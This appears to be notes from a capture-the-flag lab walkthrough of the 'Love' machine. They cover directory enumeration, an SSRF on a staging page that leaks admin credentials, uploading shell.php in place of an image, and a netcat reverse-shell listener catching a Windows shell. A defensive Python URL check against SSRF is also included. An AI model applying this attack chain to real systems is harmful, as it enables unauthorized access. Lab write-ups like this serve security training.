2 :80
$ gobuster dir -u http://love.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 50
===============================================================
/index.php (Status: 200) [Size: 4388]
/images (Status: 301) [Size: 330] [--> http://love.htb/images/]
/admin (Status: 301) [Size: 329] [--> http://love.htb/admin/]
/plugins (Status: 301) [Size: 331] [--> http://love.htb/plugins/]
/includes (Status: 301) [Size: 332] [--> http://love.htb/includes/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/preview.php (Status: 302) [Size: 0] [--> index.php]
/dist (Status: 301) [Size: 328] [--> http://love.htb/dist/]
/licenses (Status: 403) [Size: 417]
/Plugins (Status: 301) [Size: 331] [--> http://love.htb/Plugins/]
/phpmyadmin (Status: 403) [Size: 298]
/webalizer (Status: 403) [Size: 298]
/Logout.php (Status: 302) [Size: 0] [--> index.php]
http://love.htb/admin/index.php allows username enumeration.
Username admin is valid.
https://love.htb
Forbidden
You don't have permission to access this resource
http://staging.love.htb/beta.php
Specify the file url: localhost:5000
Voting system Administration
Vote Admin Creds admin: @LoveIsInTheAir!!!!
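The file URL form on beta.php fetched localhost:5000 and returned the internal administration page. As an added example (not part of the original notes or of the application's code), this is a server-side check such a fetcher could run before requesting a user-supplied URL. The function names, the http/https and port 80/443 allow-lists and the resolver parameter are assumptions of this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy for this example: only plain web URLs on the default ports.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def system_resolver(host):
    """Return every address the system resolver gives for host (name or literal)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def check_fetch_url(url, resolver=system_resolver):
    """Return (True, addresses) if url may be fetched, else (False, reason)."""
    parts = urlsplit(url)
    # "localhost:5000" carries no http/https scheme, so it stops here.
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        addresses = resolver(parts.hostname)
    except (OSError, UnicodeError):
        return False, "host does not resolve"
    if not addresses:
        return False, "host does not resolve"
    # Check every resolved address: a single loopback or private record is
    # enough to reach an internal service, whatever the host name looks like.
    for text in addresses:
        try:
            ip = ipaddress.ip_address(text)
        except ValueError:
            return False, "unparseable address"
        if not ip.is_global:
            return False, f"non-public address {ip}"
    return True, addresses
```

The fetcher should connect to one of the returned addresses rather than resolving the name a second time, and run the same check on every redirect target.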
http://love.htb/admin
Successful login
Create a new Voter.
Upload shell.php in place of the image and save.
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.119] from (UNKNOWN) [10.129.105.29] 52571
SOCKET: Shell has connected! PID: 5696
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
whoami
love\phoebe